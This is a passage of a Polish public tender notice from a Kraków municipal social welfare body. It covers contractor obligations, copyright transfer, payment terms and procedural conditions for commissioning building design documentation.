12.	Projekt budowlany ma być dostarczony w 2 egzemplarzach wraz z decyzją                                   o pozwoleniu na budowę i zmianę sposobu użytkowania.  
13.	Wykonawca ma obowiązek uzyskać akceptację przyjętych rozwiązań przez zamawiającego oraz Zarząd Budynków Komunalnych w Krakowie, przed złożeniem wniosku o wydanie pozwolenia na budowę i zmianę sposobu użytkowania. 
14.	Wszelkich niezbędnych uzgodnień dokonuje wykonawca.
15.	Dokumentacja projektowa i rozwiązania w niej przyjęte muszą spełniać                                      w szczególności następujące warunki:
1)  Dokumentacja ma być kompletna z punktu widzenia celu jakiemu ma służyć,
2) Wykonana dokumentacja ma być zgodna m.in. z przepisami:
a)	ustawy z dnia 7 lipca 1994 roku Prawo budowlane wraz z przepisami wykonawczymi,
b)	rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002 w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (tekst jednolity: Dz. U. z 2015 roku, poz. 1122), w tym również nowe wymagania dotyczące izolacji termicznej przegród,
c)	rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004 roku w sprawie określenia metod i podstaw sporządzenia kosztorysu inwestorskiego, obliczenia planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno                                - użytkowym (Dz. U. z 2004 roku, Nr 130, poz. 1389),
d)	rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia                               7 czerwca 2010 roku w sprawie ochrony przeciwpożarowej budynków, innych obiektów budowlanych i terenów (Dz. U. z 2010 roku, Nr 109, poz. 719),
e)	rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 24 lipca 2009 roku w sprawie przeciwpożarowego zaopatrzenia w wodę oraz dróg pożarowych (Dz. U. z 2009 roku, Nr 124, poz. 1030),
f)	rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia                             2 grudnia 2015 roku w sprawie uzgadniania projektu budowlanego pod względem ochrony przeciwpożarowej (Dz. U. z 2015 roku, poz. 2117),
g)	wszystkimi innymi unormowaniami, zasadami, standardami i przepisami prawnymi których należy przestrzegać przy realizacji tego typu inwestycji.
16.	Wykonawca zobowiązany jest reagować na wezwania do usunięcia braków                              we wszystkich złożonych rzez siebie dokumentach w terminach wskazanych w tych wezwaniach. Jeżeli wezwanie dotyczy dokumentów otrzymanych od zamawiającego wykonawca zobowiązany jest odebrać od zamawiającego poprawne dokumenty,                     ale nie odpowiada za opóźnienie w przypadku, gdy zamawiający dopuścił się opóźnienia i nie przygotował tych dokumentów w odpowiednim czasie, tj. najpóźniej w dniu wyznaczonym na uzupełnienie braków.
17.	W ramach zamówienia, w razie potrzeby, wykonawca zobowiązany jest wykonać niezbędne odkrywki w celu sprawdzenia elementów obiektów i sprawdzenia ich stanu w celu ujęcia w projekcie niezbędnych robót budowlanych zapewniających bezpieczeństwo użytkowania i w celu wyeliminowania ryzyka degradacji skutków robót budowlanych wykonanych na podstawie dokumentacji opracowanej przez wykonawcę, w związku ze złym stanem technicznym niewidocznych, na etapie projektowania, elementów budynków. Usunięcie skutków uszkodzeń w związku                      z odkrywkami należy przewidzieć w dokumentacji projektowej.
18.	Wykonawca zobowiązany jest uzyskać niezbędne warunki dot. mediów we własnym zakresie.
19.	Wykonawca zobowiązany jest we własnym zakresie prowadzić wymagane uzgodnienia z Zarządem Budynków Komunalnych w Krakowie.

Pozostałe warunki realizacji przedmiotu zamówienia.
1.	Dodatkowe obowiązki i informacje dot. Wykonawcy.
1)	Wykonawca złoży oświadczenie, że sporządzona przez niego, w ramach realizacji przedmiotu zamówienia, dokumentacja została przygotowana zgodnie                            z obowiązującymi w zakresie jej sporządzenia przepisami prawa                                            (w tym w szczególności prawa budowlanego), normami, standardami i zasadami oraz że jest kompletna z punktu widzenia celu do jakiego ma służyć.
2)	Wykonawca zobowiązany jest do uwzględnienia w ofercie wszystkich kosztów, jakie poniesie w związku z realizacją przedmiotu zamówienia, w tym również kosztów wszystkich uzgodnień. Stosowne oświadczenie w tej sprawie ma dołączyć do oferty.
3)	Wykonawca zrealizuje przedmiot zamówienia zapewniając na własny koszt siłę roboczą, wszystkie środki techniczne potrzebne do jego realizacji oraz wszystkie usługi specjalistyczne.
4)	Wraz z dokumentacją projektową wykonawca złoży oświadczenie                                        o sporządzeniu projektu zgodnie z obowiązującymi przepisami oraz zasadami wiedzy technicznej zgodnie z art. 20 ust. 4 ustawy z dnia 7 lipca 1994 roku Prawo budowlane (tekst jednolity: Dz. U. z 2016 roku poz. 290 z późniejszymi zmianami).
5)	Wykonawca złoży oświadczenie, że wziął pod uwagę wszystkie okoliczności                      i uwarunkowania mające lub mogące mieć wpływ na realizację przedmiotu zamówienia i że zostało to przez niego uwzględnione w cenie realizacji przedmiotu zamówienia.
2.	Odpowiedzialność za wady, zabezpieczenie wykonania umowy oraz warunki gwarancji i rękojmi
1)	Wykonawca ponosi odpowiedzialność za opóźnienia w realizacji całego zamierzenia budowlanego powstałe w wyniku popełnionych przez niego błędów w realizacji przedmiotu zamówienia oraz wad dokumentacji projektowej. 
2)	Zobowiązania wynikające z rękojmi, gwarancji oraz konsekwencje wad                               w dokumentacji projektowej ponosi wykonawca w całym zakresie prowadzonych działań w związku z realizacją przedmiotu zamówienia, w tym również w zakresie zleconym podwykonawcom.
3)	Gwarancja i rękojmia na dokumentację projektową opracowaną i dostarczoną przez wykonawcę obejmuje również ewentualne błędy, których konsekwencje zostaną ujawnione na etapie użytkowania.
4)	Wykonawca ma obowiązek usunąć wady dokumentacji projektowej w terminie:
a)	do 4 dni od daty przekazania przez uczestników procesu inwestycyjnego informacji w tym zakresie,
b)	jeżeli usunięcie wady w terminie 4 dni jest niemożliwe, z przyczyn obiektywnych i uzasadnionych przez wykonawcę, zamawiający może wyznaczyć wykonawcy inny termin usunięcia wad. 
5)	W przypadku nieusunięcia wad dokumentacji projektowej w terminie,                                         o którym mowa w pkt. 4 zamawiający ma prawo:
a)	obciążyć wykonawcę wszelkimi kosztami powstałymi w wyniku opóźnienia w usunięciu wad, w tym w szczególności dotyczącymi wstrzymania procesu inwestycyjnego oraz utrudnień w zakresie użytkowania lokalu,
b)	zlecić usunięcie wad dokumentacji projektowej osobie trzeciej. Wykonawca, na podstawie art. 49 ust. 2 ustawy z dnia 4 lutego 1994 roku                o prawie autorskim i prawach pokrewnych (tekst jednolity: Dz. U. z 2016 roku, poz. 666 ze zmianami), wyraża zgodę na wprowadzenie zmian                          w opracowanej przez niego dokumentacji. Zmiany mają być wprowadzone przez osoby posiadające odpowiednie uprawnienia. Wykonawca ma prawo do analizy dokumentacji opracowanej przez osoby trzecie i wnioskowania o wprowadzenie zmian w terminie do 4 dni od daty przekazania przez zamawiającego dokumentów, w których osoba trzecia poprawiała wady dokumentacji sporządzonej przez wykonawcę. Nie wniesienie uwag w ww. terminie oznacza akceptację przekazanej dokumentacji. W takim wypadku wykonawca w dalszym ciągu pełni nadzór autorski nad realizacją całości prac budowlanych i składa u zamawiającego oświadczenie, o którym mowa w art. 36a ust. 6 ustawy z dnia 7 lipca 1994 roku Prawo budowlane                   (tekst jednolity: Dz. U. z 2016 roku poz. 290). 
c)	Wykonawca nie ponosi odpowiedzialności za opóźnienia w realizacji przedmiotu zamówienia powstałe z przyczyn nie leżących po jego stronie.
3.	Prawa autorskie.
1)	Zamawiający, wraz z dokumentacją projektową nabywa również autorskie prawa majątkowe, zgodnie z art. 41 ust. 1 pkt. 1 i 2 ustawy z dnia 4 lutego 1994 roku                o prawie autorskim i prawach pokrewnych (tekst jednolity: Dz. U. z 2016 roku, poz. 666 ze zmianami), zarówno do utworu zbiorowego jak również                                     do poszczególnych jej części mających samodzielne znaczenie. 
2)	W rozumieniu ustawy z dnia 4 lutego 1994 roku o prawie autorskim i prawach pokrewnych (tekst jednolity: Dz. U. z 2016 roku, poz. 666 ze zmianami) zamawiający ma prawo do opublikowania, rozpowszechnienia, wprowadzenia przedmiotu zamówienia do obrotu i korzystania z dokumentacji w ramach odrębnych pól eksploatacji określonych w art. 50 ustawy o prawie autorskim                    i prawach pokrewnych, tj. do zwielokrotniania dowolną techniką, udostępniania publicznie,  umieszczania na stronie internetowej, przesyłania w wersji elektronicznej opracowanej przez wykonawcę dokumentacji projektowej,                            w tym m.in. do celów udzielenia zamówienia publicznego zgodnie z wymogami ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych                               (tekst jednolity: Dz. U. z 2015 roku, poz. 2164 z późniejszymi zmianami),                      do konsultacji i uzgodnień przyjętych rozwiązań i ubiegania się na jej podstawie do uzyskania niezbędnych dla prawidłowego użytkowania i funkcjonowania obiektu decyzji i pozwoleń,  do wykorzystania dokumentacji na cele budowlane i korzystania na placu budowy wraz z wykonaniem przy jej użyciu dokumentacji powykonawczej. Zamawiający ma prawo przekazywać i publikować dokumentację projektową lub jej część w oryginale lub zwielokrotnioną przez zamawiającego bez konieczności autoryzacji kopii przez wykonawcę. 
3)	Dokumentacja projektowa opracowana przez wykonawcę może być również                    wtórnie wykorzystywana przez zamawiającego, m. in. celem opracowania innych dokumentacji na jej podstawie, załączania jej kopii do umów, wystąpień                                o uzgodnienia, pozwolenia itp.
4)	Wykonawca ma mieć własny egzemplarz kompletnej dokumentacji projektowej celem wykonywania nadzoru autorskiego i nie będzie korzystał z egzemplarzy dostarczonych zamawiającemu.
5)	Autorskie prawa majątkowe uprawniają zamawiającego do korzystania                                 z dokumentacji projektowej w sposób zgodny z jej przeznaczeniem                                     oraz w zakresie określonym w pkt. a-d powyżej na ternie Rzeczpospolitej Polskiej na czas nieoznaczony. Wykonawca nie może wypowiedzieć umowy w zakresie przeniesienia majątkowych praw autorskich.
Za powyższe nie przysługuje wykonawcy żadne dodatkowe wynagrodzenie, przeniesienie autorskich praw majątkowych następuje z chwilą przekazania zamawiającemu dokumentacji projektowej  i przeniesieniem własności egzemplarzy dokumentacji projektowej. Wynagrodzenie za przeniesienie praw autorskich wykonawca ma uwzględnić w cenie oferty.
4.	Pozostałe warunki.
1)	Wykonawca ma obowiązek przekazać zamawiającemu wszystkie uzgodnienia                          i dokumenty uzyskane w celu realizacji przedmiotu zamówienia, w tym przede wszystkim wszystkie dokumenty uzyskane przez wykonawcę na podstawie pełnomocnictwa udzielonego mu przez zamawiającego.
2)	W przypadku braku możliwości kontynuowania prac budowlanych z przyczyn zależnych od wykonawcy (tj. m.in. nieusunięcia wad dokumentacji                                        w wyznaczonym terminie, rozwiązania umowy z przyczyn leżących po stronie wykonawcy, itp.) wyraża on zgodę na:
a)	usunięcie, w trybie art. 49 ust. 2 ustawy z dnia 4 lutego 1994 roku o prawie autorskim i prawach pokrewnych (tekst jednolity: Dz. U. z 2016 roku,                      poz. 666 ze zmianami) zastępczo wad dokumentacji projektowej przez osoby trzecie posiadające do tego odpowiednie uprawnienia,
b)	pełnienia nadzoru przez  osoby trzecie, posiadające do tego odpowiednie uprawnienia, nad zgodnością realizacji budowy z projektem przy czym wykonawca nie traci prawa do nadzoru nad sposobem korzystania                                     z opracowanej przez niego dokumentacji projektowej.
Koszty związane z wykonywaniem przez osoby trzecie obowiązków należących do wykonawcy będą obciążać wykonawcę. UWAGA: zamawiający nie musi występować do wykonawcy o wyrażenie zgody na powyższe. Podstawą                           do wykonania ww. czynności zastępczo na koszt wykonawcy jest sama umowa oraz warunek, że nie można kontynuować inwestycji z przyczyn zależnych                     od wykonawcy. Zamawiający powiadamia o tym fakcie wykonawcę pisemnie.
3)	Zamawiający może  zlecić sprawdzenie dokumentacji objętej przedmiotem zamówienia (projekt wykonawczy, specyfikacje techniczne, przedmiary                                i kosztorysy) osobie trzeciej. Wykonawca zobowiązany jest do wprowadzenia zmian/poprawek w dokumentacji i/lub jej uzupełnienia w zakresie wskazanym przez osobę sprawdzającą pod warunkiem, że nie stoi to w sprzeczności                                  z obowiązującymi przepisami prawa.
5.	Sposób kontaktu z zamawiającym.
1)	Wykonawca ma obowiązek podać w ofercie wykaz osób odpowiedzialnych                           za kontakt z zamawiającym wraz z ich danymi teleadresowymi                                                  (numer tel. komórkowego, adres poczty elektronicznej oraz numer faksu).                       Tylko korespondencja podpisana przez te osoby ma charakter wiążący.
2)	Wykonawca ma obowiązek podać w ofercie adres poczty elektronicznej,                             na które będzie przesyłana korespondencja od zamawiającego. Wysłanie korespondencji na podany numer faxu lub adres poczty elektronicznej jest równoznaczne z przekazaniem tego dokumentu wykonawcy. Bieg wszelkich terminów podanych w korespondencji rozpoczyna się z chwilą wysłania korespondencji. Wykonawca ma obowiązek zapewnić sprawność urządzeń                           i systemów z jego strony odpowiadających za odbiór korespondencji. 
3)	W przypadku korespondencji przesyłanej przez wykonawcę ma być ona dostarczana na dziennik podawczy zamawiającego, w jego siedzibie                                     przy ul. Józefińskiej 14 w Krakowie oraz każdorazowo natychmiastowo przesyłana pocztą elektroniczną na adres: dg@mops.krakow.pl lub do@mops.krakow.pl.
4)	Ze strony zamawiającego osobami upoważnionymi do kontaktów z wykonawcą są Michał Kasperczyk tel. 12 616 54 63, adres e-mail: kaspermi@mops.krakow.pl i Janusz Janicki 12 616 54 84, adres e-mail: janickja@mops.krakow.pl lub osoby 

Warunki płatności.
1)	Zapłata wynagrodzenia nastąpi w trzech transzach:
a)	60% po odbiorze przez zamawiającego kompletnej dokumentacji wchodzącej w skład przedmiotu zamówienia, 
b)	30% po uzyskaniu decyzji o pozwoleniu na budowę i zmianę sposobu użytkowania,
c)	10% po odbiorze końcowym bez wad oraz opracowaniu dokumentacji powykonawczej zawierającej wskazanie zmian stanowiących nieistotne odstępstwo w stosunku do zatwierdzonego projektu budowlanego (jeżeli będzie wymagana) dla robót prowadzonych w oparciu o dokumentację, stanowiącą przedmiot zamówienia.
2)	Płatności przelewem, na rachunek bankowy wykonawcy wskazany w fakturze                           w terminie do 14 dni od daty doręczenia zamawiającemu prawidłowo wystawionej faktury wraz z załączonym:
a)	protokołom odbioru dokumentacji,
b)	decyzją o pozwoleniu na budowę i zmianę sposobu użytkowania dla płatności podanej w pkt. 1 lit. b,
c)	bezusterkowym protokołem odbioru robót prowadzonych w oparciu                                          o dokumentację stanowiącą przedmiot niniejszego zamówienia oraz protokołem odbioru dokumentacji powykonawczej (jeżeli będzie wymagana)  dla płatności podanej w pkt 1 lit. c.
3)	Zamawiający zastrzega sobie prawo zlecenia osobie trzeciej sprawdzenia dokumentacji przed jej odbiorem.
<br /><br /><b>II.5) Główny kod CPV: </b>71220000-6<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                Zamawiający może udzielić Wykonawcy zamówień polegających na powtórzeniu usług zgodnych z przedmiotem niniejszej umowy, w trybie zamówienia z wolnej ręki,                                     w okresie trzech lat od udzielenia zamówienia podstawowego, stanowiących nie więcej niż 50% wartości zamówienia podstawowego.<br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w dniach: 120<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                O udzielenie zamówienia mogą ubiegać                              się wykonawcy, którzy wykażą, że:  dysponują osobą zdolną do wykonania przedmiotu zamówienia, tj.: osobami posiadającymi uprawnienia budowlane do projektowania                     w specjalności: 
a)	architektonicznej,
b)	konstrukcyjno  budowlanej,
c)	instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,
d)	instalacyjna w zakresie sieci, instalacji i urządzeń elektrycznych                                                 i elektroenergetycznych,
Wszystkie ww. osoby muszą być członkami właściwej Izby Inżynierów Budownictwa. W razie konieczności wykonawca zobowiązany będzie również zapewnić udział przy realizacji przedmiotu zamówienia osób z innymi aniżeli wskazano powyżej uprawnieniami.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1)	Oświadczenia wykonawcy: 
a)	o nie podleganiu wykluczeniu z postępowania,
b)	o spełnianiu warunków udziału w postępowaniu, w tym o korzystaniu: 
	przy wykazywaniu spełniania warunków udziału w postępowaniu z zasobów podmiotów trzecich,
	przy wykonywaniu zamówienia z podwykonawców;
2)	pełnomocnictwo złożone w formie oryginału lub kopii poświadczonej notarialnie;
a)	w przypadku podpisywania oferty przez osoby nie wymienione w odpisie                        z właściwego rejestru  pełnomocnictwo do podpisania oferty lub podpisania oferty i zawarcia umowy,
b)	w przypadku podmiotów występujących wspólnie pełnomocnictwo podpisane przez upoważnionych przedstawicieli każdego z podmiotów występujących wspólnie, do reprezentowania w postępowaniu                                   (zgodnie z art. 23 ustawy). 
3)	zobowiązanie innego podmiotu, na zasobach którego polega wykonawca,                      do oddania do dyspozycji wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia. 
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1)	Oświadczenia wykonawcy: 
a)	o nie podleganiu wykluczeniu z postępowania,
b)	o spełnianiu warunków udziału w postępowaniu, w tym o korzystaniu: 
	przy wykazywaniu spełniania warunków udziału w postępowaniu z zasobów podmiotów trzecich,
	przy wykonywaniu zamówienia z podwykonawców;
2)	pełnomocnictwo złożone w formie oryginału lub kopii poświadczonej notarialnie;
a)	w przypadku podpisywania oferty przez osoby nie wymienione w odpisie                        z właściwego rejestru  pełnomocnictwo do podpisania oferty lub podpisania oferty i zawarcia umowy,
b)	w przypadku podmiotów występujących wspólnie pełnomocnictwo podpisane przez upoważnionych przedstawicieli każdego z podmiotów występujących wspólnie, do reprezentowania w postępowaniu                                   (zgodnie z art. 23 ustawy). 
3)	zobowiązanie innego podmiotu, na zasobach którego polega wykonawca,                      do oddania do dyspozycji wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia. 
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin dostarczenia kompletnej dokumentacji projektowej </td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.	Wprowadzenie zmian treści umowy wymaga formy pisemnej - pod rygorem nieważności.
